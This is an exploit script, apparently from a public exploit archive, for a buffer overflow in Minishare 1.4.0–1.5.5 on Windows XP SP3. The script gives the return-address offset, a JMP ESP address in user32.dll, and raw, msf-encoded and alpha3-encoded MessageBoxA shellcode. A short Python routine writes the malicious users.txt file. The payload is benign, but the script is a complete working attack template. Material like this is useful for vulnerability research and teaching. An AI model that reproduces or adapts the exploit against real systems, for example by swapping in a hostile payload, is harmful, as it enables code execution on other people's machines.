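# Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability (users.txt)
# Date: 11/02/2010
# Author: Chris Gabriel
# Software Link: http://sourceforge.net/projects/minishare
# Version: 1.4.0 - 1.5.5
# Tested on: Windows XP SP3 EN
# CVE:
#
# Proof of concept. The script writes a crafted "users.txt" into the current
# directory; per the title above, Minishare 1.4.0 - 1.5.5 overflows a buffer
# when it reads that file. The payload only raises a MessageBoxA dialog
# (title and text "HAX"), which demonstrates control of execution.

# MessageBoxA TITLE=HAX TEXT=HAX WIN XP SP3 Shellcode
# \xbb\x48\x41\x58\x00\x53\x89\xe6\x31\xc0\x50\x56\x56\x50
# \xb8\xea\x07\x45\x7e\xff\xd0

# msfencoded MessageBoxA shellcode
# [*] x86/shikata_ga_nai succeeded with size 48 (iteration=1)
# \x33\xc9\xb1\x06\xda\xd2\xd9\x74\x24\xf4\x5b\xb8\x1f\xf9
# \xf2\x17\x83\xeb\xfc\x31\x43\x10\x03\x43\x0f\x1b\x07\xac
# \x67\x9a\xb0\xd3\x24\x95\xa7\xe5\x0a\xf5\x71\x50\xda\x4e
# \x97\x5b\x9f\xd0\x97\xb4

# ALPHA3.py x86 ascii uppercase ESP --input="shellcode-encoded"
# alpha3 encoded ascii uppercase MessageBoxA Shellcode
# The payload is kept to uppercase letters and digits, so the whole file
# stays printable text.
shellcode = (
    "TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D"
    "QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"
    "M3Z19LN2A2Z1G0N2K0N4YK0JO9L9Q1S36403F0G3V2K1"
    "Q9S123I1Y3N9R8M4E0G"
)

# 78 bytes till EIP
# 82 bytes till ESP
# 304 for payload
#
# Layout of the generated file, following the offsets above:
#   bytes 0-77   filler up to the saved return address
#   bytes 78-81  replacement return address (little-endian)
#   bytes 82-    payload; 78 + 4 = 82 is where the author's note places ESP
#
# NOTE(review): the return address is a fixed location inside user32.dll as
# shipped with Windows XP SP3, so the file only behaves as described where
# that module loads at the same address. Presumably it also needs the stack
# to be executable -- confirm against the DEP setting of the tested host.
#
# For triage, the output is one line with no trailing newline: 78 "A"
# characters, then the bytes 4B 49 48 7E, then uppercase-alphanumeric text.

# EIP OVERWRITE
buff = "A" * 78
buff += "\x4b\x49\x48\x7e"  # 7E48494B JMP ESP in user32.dll win xp sp3
buff += shellcode

try:
    # The context manager closes the handle even if write() fails part-way.
    with open("users.txt", 'w') as out_file:
        out_file.write(buff)
    # print(<single string>) gives the same output under Python 2 and Python 3.
    print("[+] Vulnerable file created! Place the 'users.txt' file in the Minishare directory and run the program...\n")
except IOError:
    # Only file-system failures are reported here; anything else (including
    # Ctrl-C) propagates with its traceback instead of being hidden.
    print("[-] Error occured!")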